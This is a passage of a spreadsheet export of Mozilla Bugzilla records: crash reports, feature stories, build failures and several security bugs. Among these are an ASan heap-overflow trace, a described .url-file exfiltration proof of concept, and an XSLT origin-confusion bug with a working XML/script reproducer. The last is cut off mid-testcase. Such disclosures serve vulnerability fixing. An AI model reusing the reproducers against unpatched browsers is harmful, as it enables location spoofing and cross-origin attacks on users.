          <t>heap-buffer-overflow (read of size 0xffffffff) when playing a m4v video (GStreamer)</t>
        </is>
      </c>
      <c r="D4406" t="inlineStr">
        <is>
          <t>2024-05-30 08:37:45 -0700</t>
        </is>
      </c>
      <c r="E4406" t="n">
        <v>1</v>
      </c>
      <c r="F4406" t="n">
        <v>1</v>
      </c>
      <c r="G4406" t="n">
        <v>3</v>
      </c>
      <c r="H4406" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4406" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4406" t="inlineStr">
        <is>
          <t>Audio/Video</t>
        </is>
      </c>
      <c r="K4406" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4406" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4406" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4406" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4406" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4406" t="inlineStr">
        <is>
          <t>[adv-main38+][adv-esr31.7+]</t>
        </is>
      </c>
      <c r="Q4406" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4406" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4406" t="inlineStr">
        <is>
          <t>mozilla40</t>
        </is>
      </c>
      <c r="T4406" t="n">
        <v>1</v>
      </c>
      <c r="U4406" t="n">
        <v>0</v>
      </c>
      <c r="V4406" t="n">
        <v>72</v>
      </c>
      <c r="W4406" t="inlineStr">
        <is>
          <t>Created attachment 8502981
ff-bigbof.m4v
ASan reports the buffer overflow when the attached video is played. Current normal build crashes at null. The size suggests that it could be static and guaranteed to just crash, but worth checking how this ends up happening. Filing as a security bug to be on the safe side.
==13165==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61d000b4da6f at pc 0x43b8be bp 0x7f73e11dd95
0 sp 0x7f73e11dd108
READ of size 4294967295 at 0x61d000b4da6f thread T48 (multiqueue1:src)
    #0 0x43b8bd in __interceptor_memcpy _asan_rtl_
    #1 0x7f73e07cfa05 in ?? ??:0
    #2 0x7f73e07cfd3c in ?? ??:0
[...]
Thread T48 (multiqueue1:src) created by T46 (qtdemux0:sink) here:
    #0 0x425e86 in __interceptor_pthread_create _asan_rtl_
    #1 0x7f740f4bc92e in ?? ??:0</t>
        </is>
      </c>
      <c r="X4406" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4407">
      <c r="A4407" t="n">
        <v>350787</v>
      </c>
      <c r="B4407" t="inlineStr">
        <is>
          <t>2006-08-30 17:48:24 -0700</t>
        </is>
      </c>
      <c r="C4407" t="inlineStr">
        <is>
          <t>1.8 branch startup crashes [@ js_Interpret], line 5506</t>
        </is>
      </c>
      <c r="D4407" t="inlineStr">
        <is>
          <t>2011-06-09 14:58:44 -0700</t>
        </is>
      </c>
      <c r="E4407" t="n">
        <v>1</v>
      </c>
      <c r="F4407" t="n">
        <v>1</v>
      </c>
      <c r="G4407" t="n">
        <v>3</v>
      </c>
      <c r="H4407" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4407" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4407" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K4407" t="inlineStr">
        <is>
          <t>1.8 Branch</t>
        </is>
      </c>
      <c r="L4407" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4407" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4407" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4407" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4407" t="inlineStr"/>
      <c r="Q4407" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4407" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4407" t="inlineStr">
        <is>
          <t>mozilla1.8.1</t>
        </is>
      </c>
      <c r="T4407" t="n">
        <v>1</v>
      </c>
      <c r="U4407" t="n">
        <v>1</v>
      </c>
      <c r="V4407" t="n">
        <v>28</v>
      </c>
      <c r="W4407" t="inlineStr">
        <is>
          <t>A bunch of users have been crashing on startup in 1.8 branch builds with stacks pointing to js_Interpret, line 5506.  There seem to be two variations of this stack:
Incident ID: 22670580
Stack Signature	js_Interpret() 44249002
Product ID	Firefox2
Build ID	2006082804
Trigger Time	2006-08-29 19:03:37.0
Platform	LinuxIntel
Operating System	Linux 2.4.31
Module	libmozjs.so + (00040b8d)
URL visited	
User Comments	
Since Last Crash	0 sec
Total Uptime	5 sec
Trigger Reason	SIGSEGV: Segmentation Fault: (signal 11)
Source File, Line No.	/builds/tinderbox/Fx-Mozilla1.8/Linux_2.4.21-27.0.4.EL_Depend/mozilla/js/src/jsinterp.c, line 5506
Stack Trace 	
js_Interpret()  [mozilla/js/src/jsinterp.c, line 5506]
js_Invoke()  [mozilla/js/src/jsinterp.c, line 1369]
nsXPCWrappedJSClass::CallMethod()  [mozilla/js/src/xpconnect/src/xpcwrappedjsclass.cpp, line 1415]
nsXPCWrappedJS::CallMethod()  [mozilla/js/src/xpconnect/src/xpcwrappedjs.cpp, line 468]
PrepareAndDispatch()  [mozilla/xpcom/reflect/xptcall/src/md/unix/xptcstubs_gcc_x86_unix.cpp, line 100]
nsObserverService::NotifyObservers()  [mozilla/xpcom/ds/nsObserverService.cpp, line 848]
nsXREDirProvider::DoStartup()  [mozilla/toolkit/xre/nsXREDirProvider.cpp, line 591]
XRE_main()  [mozilla/toolkit/xre/nsAppRunner.cpp, line 2308]
main()  [mozilla/browser/app/nsBrowserApp.cpp, line 62]
libc.so.6 + 0x1544b (0x40a5044b)
Incident ID: 22658782
Stack Signature	js_Interpret 68a0a449
Product ID	Firefox2
Build ID	2006082803
Trigger Time	2006-08-29 12:55:43.0
Platform	Win32
Operating System	Windows NT 5.1 build 2600
Module	js3250.dll + (00028c47)
URL visited	startup
User Comments	
Since Last Crash	26567 sec
Total Uptime	33847 sec
Trigger Reason	Access violation
Source File, Line No.	c:/builds/tinderbox/Fx-Mozilla1.8/WINNT_5.2_Depend/mozilla/js/src/jsinterp.c, line 5506
Stack Trace 	
js_Interpret  [mozilla/js/src/jsinterp.c, line 5506]
js_Invoke  [mozilla/js/src/jsinterp.c, line 1369]
nsXPCWrappedJSClass::CallMethod  [mozilla/js/src/xpconnect/src/xpcwrappedjsclass.cpp, line 1415]
nsXPCWrappedJS::CallMethod  [mozilla/js/src/xpconnect/src/xpcwrappedjs.cpp, line 468]
SharedStub  [mozilla/xpcom/reflect/xptcall/src/md/win32/xptcstubs.cpp, line 147]
mozJSComponentLoader::GetFactory  [mozilla/js/src/xpconnect/loader/mozJSComponentLoader.cpp, line 452]
nsFactoryEntry::GetFactory  [mozilla/xpcom/components/nsComponentManager.h, line 302]
nsComponentManagerImpl::CreateInstanceByContractID  [mozilla/xpcom/components/nsComponentManager.cpp, line 1978]
nsComponentManagerImpl::GetServiceByContractID  [mozilla/xpcom/components/nsComponentManager.cpp, line 2410]
CallGetService  [mozilla/xpcom/build/nsComponentManagerUtils.cpp, line 95]
nsCommandLine::EnumerateHandlers  [mozilla/toolkit/components/commandlines/src/nsCommandLine.cpp, line 568]
nsCommandLine::Run  [mozilla/toolkit/components/commandlines/src/nsCommandLine.cpp, line 592]
main  [mozilla/browser/app/nsBrowserApp.cpp, line 61]
kernel32.dll + 0x16fd7 (0x7c816fd7)
Some users have been reporting the crash multiple times; it seems like it might be that a given user sees only one of the stacks, although I haven't looked too closely.
The line with the crash is within the JSOP_INITCATCHVAR case:
            ok = OBJ_GET_ATTRIBUTES(cx, obj, id, NULL, &amp;attrs);</t>
        </is>
      </c>
      <c r="X4407" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4408">
      <c r="A4408" t="n">
        <v>617464</v>
      </c>
      <c r="B4408" t="inlineStr">
        <is>
          <t>2010-12-07 15:04:13 -0800</t>
        </is>
      </c>
      <c r="C4408" t="inlineStr">
        <is>
          <t>Several tables are MyISAM</t>
        </is>
      </c>
      <c r="D4408" t="inlineStr">
        <is>
          <t>2011-01-05 15:17:47 -0800</t>
        </is>
      </c>
      <c r="E4408" t="n">
        <v>1</v>
      </c>
      <c r="F4408" t="n">
        <v>1</v>
      </c>
      <c r="G4408" t="n">
        <v>5</v>
      </c>
      <c r="H4408" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4408" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J4408" t="inlineStr">
        <is>
          <t>Army of Awesome</t>
        </is>
      </c>
      <c r="K4408" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4408" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4408" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4408" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4408" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4408" t="inlineStr">
        <is>
          <t>[qa-]</t>
        </is>
      </c>
      <c r="Q4408" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4408" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4408" t="inlineStr">
        <is>
          <t>2.4</t>
        </is>
      </c>
      <c r="T4408" t="n">
        <v>1</v>
      </c>
      <c r="U4408" t="n">
        <v>0</v>
      </c>
      <c r="V4408" t="n">
        <v>5</v>
      </c>
      <c r="W4408" t="inlineStr">
        <is>
          <t>It should be InnoDB. And write a test so this doesn't happen anymore.</t>
        </is>
      </c>
      <c r="X4408" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4409">
      <c r="A4409" t="n">
        <v>1090244</v>
      </c>
      <c r="B4409" t="inlineStr">
        <is>
          <t>2014-10-28 07:25:13 -0700</t>
        </is>
      </c>
      <c r="C4409" t="inlineStr">
        <is>
          <t>'make test' failling on untarring of breakpad.tar.gz</t>
        </is>
      </c>
      <c r="D4409" t="inlineStr">
        <is>
          <t>2014-10-30 06:01:52 -0700</t>
        </is>
      </c>
      <c r="E4409" t="n">
        <v>1</v>
      </c>
      <c r="F4409" t="n">
        <v>1</v>
      </c>
      <c r="G4409" t="n">
        <v>4</v>
      </c>
      <c r="H4409" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4409" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J4409" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4409" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4409" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4409" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4409" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4409" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4409" t="inlineStr"/>
      <c r="Q4409" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4409" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4409" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4409" t="n">
        <v>1</v>
      </c>
      <c r="U4409" t="n">
        <v>0</v>
      </c>
      <c r="V4409" t="n">
        <v>4</v>
      </c>
      <c r="W4409" t="inlineStr">
        <is>
          <t>+ wget -N --quiet https://ci.mozilla.org/job/breakpad/lastSuccessfulBuild/artifact/breakpad.tar.gz
+ tar -zxf breakpad.tar.gz
tar: Skipping to next header
tar: Exiting with failure status due to previous errors
make: *** [bootstrap] Error 2
When I try to manually download and then untar the file, I get the following: 
(socorro-virtualenv)[vagrant@localhost socorro]$ tar tvf breakpad.tar.gz 
drwxr-xr-x root/root         0 2014-10-24 11:03 breakpad/
drwxr-xr-x root/root         0 2014-10-24 11:03 breakpad/share/
drwxr-xr-x root/root         0 2014-10-24 11:03 breakpad/share/doc/
drwxr-xr-x root/root         0 2014-10-24 11:03 breakpad/share/doc/breakpad-0.1/
-rwxr-xr-x root/root      2333 2014-10-24 11:03 breakpad/share/doc/breakpad-0.1/LICENSE
tar: Skipping to next header
tar: Exiting with failure status due to previous errors</t>
        </is>
      </c>
      <c r="X4409" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4410">
      <c r="A4410" t="n">
        <v>765936</v>
      </c>
      <c r="B4410" t="inlineStr">
        <is>
          <t>2012-06-18 15:48:02 -0700</t>
        </is>
      </c>
      <c r="C4410" t="inlineStr">
        <is>
          <t>IndexedDB wrapper behavior is still totally broken</t>
        </is>
      </c>
      <c r="D4410" t="inlineStr">
        <is>
          <t>2012-10-21 22:19:26 -0700</t>
        </is>
      </c>
      <c r="E4410" t="n">
        <v>1</v>
      </c>
      <c r="F4410" t="n">
        <v>1</v>
      </c>
      <c r="G4410" t="n">
        <v>3</v>
      </c>
      <c r="H4410" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4410" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4410" t="inlineStr">
        <is>
          <t>Storage: IndexedDB</t>
        </is>
      </c>
      <c r="K4410" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4410" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4410" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4410" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4410" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4410" t="inlineStr">
        <is>
          <t>[advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q4410" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4410" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4410" t="inlineStr">
        <is>
          <t>mozilla16</t>
        </is>
      </c>
      <c r="T4410" t="n">
        <v>1</v>
      </c>
      <c r="U4410" t="n">
        <v>0</v>
      </c>
      <c r="V4410" t="n">
        <v>29</v>
      </c>
      <c r="W4410" t="inlineStr">
        <is>
          <t>Created attachment 634216
a test that adds an expando and dies
I accidentally added an expando to a request because meta-/ thought onfailure was a good name and I agreed.
This results in:
###!!! ASSERTION: Already rooted?!: '!PreservingWrapper()', file /home/visbrero/rev_control/fgit/b2g-gaia/mozilla-central/dom/indexedDB/IDBRequest.cpp, line 80
I have included a dubiously named xpcshell test for your edification.</t>
        </is>
      </c>
      <c r="X4410" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4411">
      <c r="A4411" t="n">
        <v>1810143</v>
      </c>
      <c r="B4411" t="inlineStr">
        <is>
          <t>2023-01-13 06:20:47 -0800</t>
        </is>
      </c>
      <c r="C4411" t="inlineStr">
        <is>
          <t>Possible Download of .url Files for Data Exfiltration</t>
        </is>
      </c>
      <c r="D4411" t="inlineStr">
        <is>
          <t>2024-05-30 11:03:51 -0700</t>
        </is>
      </c>
      <c r="E4411" t="n">
        <v>1</v>
      </c>
      <c r="F4411" t="n">
        <v>1</v>
      </c>
      <c r="G4411" t="n">
        <v>2</v>
      </c>
      <c r="H4411" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4411" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J4411" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K4411" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4411" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4411" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4411" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4411" t="inlineStr">
        <is>
          <t>DUPLICATE</t>
        </is>
      </c>
      <c r="P4411" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?]</t>
        </is>
      </c>
      <c r="Q4411" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4411" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S4411" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4411" t="n">
        <v>0</v>
      </c>
      <c r="U4411" t="n">
        <v>0</v>
      </c>
      <c r="V4411" t="n">
        <v>3</v>
      </c>
      <c r="W4411" t="inlineStr">
        <is>
          <t>Created attachment 9312178
poc.html
In Firefox it has implemented a security measure to protect users by replacing the download of ".lnk" files with ".download" extension. However, there is another file extension that is considered to be more severe than ".lnk", which is the ".url" extension.
A ".url" file, also known as a URL shortcut, is a type of link file that points to a web page or other resource on the internet. These files can be created by the user or by an application, and can be used to quickly access a specific webpage. However, if a ".url" file is maliciously created by an attacker, it can contain a script or other code that will execute automatically when the file is opened. This can lead to the execution of malware, the stealing of personal information, or other malicious activity.
hence made a POC which uses this method by convincing the user to save and upload the saved file for data exfiltration.</t>
        </is>
      </c>
      <c r="X4411" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4412">
      <c r="A4412" t="n">
        <v>433758</v>
      </c>
      <c r="B4412" t="inlineStr">
        <is>
          <t>2008-05-14 13:31:14 -0700</t>
        </is>
      </c>
      <c r="C4412" t="inlineStr">
        <is>
          <t>Crash [@ nsContentList::Item] with null this</t>
        </is>
      </c>
      <c r="D4412" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:47 -0700</t>
        </is>
      </c>
      <c r="E4412" t="n">
        <v>1</v>
      </c>
      <c r="F4412" t="n">
        <v>1</v>
      </c>
      <c r="G4412" t="n">
        <v>3</v>
      </c>
      <c r="H4412" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4412" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4412" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K4412" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4412" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4412" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4412" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4412" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4412" t="inlineStr">
        <is>
          <t>[sg:critical?] post 1.8-branch</t>
        </is>
      </c>
      <c r="Q4412" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4412" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4412" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4412" t="n">
        <v>1</v>
      </c>
      <c r="U4412" t="n">
        <v>0</v>
      </c>
      <c r="V4412" t="n">
        <v>16</v>
      </c>
      <c r="W4412" t="inlineStr">
        <is>
          <t>reproduced on fedora 6 32bit but not centos5 64bit.
#5  0x00002aaab3a3eae0 in nsContentList::Item (this=0x0, aIndex=0, aDoFlush=1)
    at /work/mozilla/builds/1.9.0/mozilla/content/base/src/nsContentList.cpp:378
#6  0x00002aaab3bbb4d7 in nsHTMLDocument::GetDocumentAllResult (
    this=0x21253660, aID=@0x7fff98372c10, aResult=0x7fff98372c40)
    at /work/mozilla/builds/1.9.0/mozilla/content/html/document/src/nsHTMLDocument.cpp:3892
#7  0x00002aaab3d21360 in nsHTMLDocumentSH::DocumentAllGetProperty (
    cx=0x20c4ae10, obj=0x216ae340, id=560133188, vp=0x7fff98372d20)
    at /work/mozilla/builds/1.9.0/mozilla/dom/src/base/nsDOMClassInfo.cpp:8010
#8  0x00002aaab3d21786 in nsHTMLDocumentSH::DocumentAllNewResolve (
    cx=0x20c4ae10, obj=0x216ae340, id=560133188, flags=1, objp=0x7fff98372de0)
    at /work/mozilla/builds/1.9.0/mozilla/dom/src/base/nsDOMClassInfo.cpp:8098
#9  0x00002aaaaadc8c4c in js_LookupPropertyWithFlags (cx=0x20c4ae10, 
    obj=0x216ae340, id=560133188, flags=1, objp=0x7fff98372ee0, 
    propp=0x7fff98372ed8)
    at /work/mozilla/builds/1.9.0/mozilla/js/src/jsobj.c:3334</t>
        </is>
      </c>
      <c r="X4412" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4413">
      <c r="A4413" t="n">
        <v>891249</v>
      </c>
      <c r="B4413" t="inlineStr">
        <is>
          <t>2013-07-08 23:19:41 -0700</t>
        </is>
      </c>
      <c r="C4413" t="inlineStr">
        <is>
          <t>[User Story][WAP Push] MSISDN filtering</t>
        </is>
      </c>
      <c r="D4413" t="inlineStr">
        <is>
          <t>2013-09-16 07:20:05 -0700</t>
        </is>
      </c>
      <c r="E4413" t="n">
        <v>1</v>
      </c>
      <c r="F4413" t="n">
        <v>1</v>
      </c>
      <c r="G4413" t="n">
        <v>6</v>
      </c>
      <c r="H4413" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4413" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J4413" t="inlineStr">
        <is>
          <t>RIL</t>
        </is>
      </c>
      <c r="K4413" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4413" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4413" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N4413" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4413" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4413" t="inlineStr">
        <is>
          <t>[ucid:WAP-Push3, FT:RIL, KOI:P1]</t>
        </is>
      </c>
      <c r="Q4413" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4413" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4413" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4413" t="n">
        <v>1</v>
      </c>
      <c r="U4413" t="n">
        <v>0</v>
      </c>
      <c r="V4413" t="n">
        <v>9</v>
      </c>
      <c r="W4413" t="inlineStr">
        <is>
          <t>User story:
As an operator I want to define which MSISDNs can send wap push messages to user so the user is not spammed by adverts</t>
        </is>
      </c>
      <c r="X4413" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4414">
      <c r="A4414" t="n">
        <v>865221</v>
      </c>
      <c r="B4414" t="inlineStr">
        <is>
          <t>2013-04-24 07:14:53 -0700</t>
        </is>
      </c>
      <c r="C4414" t="inlineStr">
        <is>
          <t>Missing 'splash' screen when launching web-apps</t>
        </is>
      </c>
      <c r="D4414" t="inlineStr">
        <is>
          <t>2020-12-21 10:38:00 -0800</t>
        </is>
      </c>
      <c r="E4414" t="n">
        <v>1</v>
      </c>
      <c r="F4414" t="n">
        <v>1</v>
      </c>
      <c r="G4414" t="n">
        <v>6</v>
      </c>
      <c r="H4414" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4414" t="inlineStr">
        <is>
          <t>Firefox for Android Graveyard</t>
        </is>
      </c>
      <c r="J4414" t="inlineStr">
        <is>
          <t>Web Apps (PWAs)</t>
        </is>
      </c>
      <c r="K4414" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4414" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M4414" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N4414" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4414" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4414" t="inlineStr">
        <is>
          <t>[A4A]</t>
        </is>
      </c>
      <c r="Q4414" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4414" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4414" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4414" t="n">
        <v>1</v>
      </c>
      <c r="U4414" t="n">
        <v>0</v>
      </c>
      <c r="V4414" t="n">
        <v>4</v>
      </c>
      <c r="W4414" t="inlineStr">
        <is>
          <t>On mozilla-central (Nightly 04/24) and mozilla-aurora (Aurora 04/24), I noticed that there are no 'splash' screens anymore (i.e, we used to show the application icon). This works on mozilla-beta.
Using https://marketplace.firefox.com/app/kiss-and-makeup/ as an example.
--
Nightly (04/24)
LG Nexus 4 (Android 4.2.2)</t>
        </is>
      </c>
      <c r="X4414" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4415">
      <c r="A4415" t="n">
        <v>1769155</v>
      </c>
      <c r="B4415" t="inlineStr">
        <is>
          <t>2022-05-12 15:55:11 -0700</t>
        </is>
      </c>
      <c r="C4415" t="inlineStr">
        <is>
          <t>XSLT error handler may set up error document in incorrect context</t>
        </is>
      </c>
      <c r="D4415" t="inlineStr">
        <is>
          <t>2024-06-04 14:06:22 -0700</t>
        </is>
      </c>
      <c r="E4415" t="n">
        <v>1</v>
      </c>
      <c r="F4415" t="n">
        <v>1</v>
      </c>
      <c r="G4415" t="n">
        <v>3</v>
      </c>
      <c r="H4415" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4415" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4415" t="inlineStr">
        <is>
          <t>XSLT</t>
        </is>
      </c>
      <c r="K4415" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4415" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4415" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4415" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4415" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4415" t="inlineStr">
        <is>
          <t>[adv-main104+][adv-esr91.13+][adv-esr102.2+]</t>
        </is>
      </c>
      <c r="Q4415" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4415" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S4415" t="inlineStr">
        <is>
          <t>105 Branch</t>
        </is>
      </c>
      <c r="T4415" t="n">
        <v>1</v>
      </c>
      <c r="U4415" t="n">
        <v>0</v>
      </c>
      <c r="V4415" t="n">
        <v>51</v>
      </c>
      <c r="W4415" t="inlineStr">
        <is>
          <t>The XSLT processor may act on the wrong context when reporting an error, thus possibly substitute the wrong document with an (attacker-controlled) error document. This can cause a state where different documents (of potentially different origins) refer to the same outer window.
With fission disabled, this can also fully spoof the displayed location / `window.location`.
 ### Testcase 1
 `http://localhost/testcase1.xml`:
 ```xml
 &lt;?xml-stylesheet type="application/xml" href="#sheet"?&gt;
 &lt;stylesheet id="sheet" version="1.0" xmlns="http://www.w3.org/1999/XSL/Transform"&gt;
 &lt;template match="/"&gt;
     &lt;script xmlns="http://www.w3.org/1999/xhtml"&gt;
         window.location = 'data:image/png,x'
         alert()
     &lt;/script&gt;
 &lt;/template&gt;
 &lt;/stylesheet&gt;
 ```
 **Expected:** Upon load, we should be redirected to `data:image/png,x`, an `ImageDocument` on a nullprincipal.
 **Actual result:** We're redirected to `data:image/png,x`, but the document is an `XMLDocument` on the origin `localhost`.
 What happens:
 - The XSLT processor executes the contained sheet and inserts a `&lt;script&gt;` element as per the `&lt;template&gt;` rule.
 - The script runs immediately (while the XSLT processor is still active) and initiates relocation to the `data:` image URI.
 - The `alert()` modal suspends the XSLT processor, keeping it from completing normally.
 - When the location change cancels the XSLT processor, the newly created error document replaces new image document *after* the redirect.
 Corresponding DOMLeak log:
 ```
 [Child 2141987: Main Thread]: D/DOMLeakOuter DOMWINDOW 614000009e40 created outer=nullptr
 [Child 2141987: Main Thread]: D/DOMLeakInner DOMWINDOW 61900014a580 created outer=614000009e40
 [Child 2141987: Main Thread]: D/DOMLeakInner DOMWINDOW 61900014a580 SetNewDocument about:blank
 [Child 2141987: Main Thread]: D/DOMLeakInner DOMWINDOW 61900014fa80 created outer=614000009e40
 [Child 2141987: Main Thread]: D/DOMLeakInner DOMWINDOW 61900014fa80 SetNewDocument http://localhost/testcase1.xml
 [Child 2141987: Main Thread]: D/DOMLeakInner DOMWINDOW 6190001b7680 created outer=614000009e40
 [Child 2141987: Main Thread]: D/DOMLeakInner DOMWINDOW 6190001b7680 SetNewDocument data:image/png,x
 [Child 2141987: Main Thread]: D/DOMLeakInner DOMWINDOW 619000247780 created outer=614000009e40
 [Child 2141987: Main Thread]: D/DOMLeakInner DOMWINDOW 619000247780 SetNewDocument http://localhost/testcase1.xml
 ```
### Testcase 2
 This behavior can also be leveraged to reach div. invalid states and crashes, e.g.:
 ```xml
 &lt;?xml-stylesheet type="application/xml" href="#sheet"?&gt;
 &lt;stylesheet id="sheet" version="1.0" xmlns="http://www.w3.org/1999/XSL/Transform"&gt;
 &lt;template match="/"&gt;
     &lt;script xmlns="http://www.w3.org/1999/xhtml"&gt;
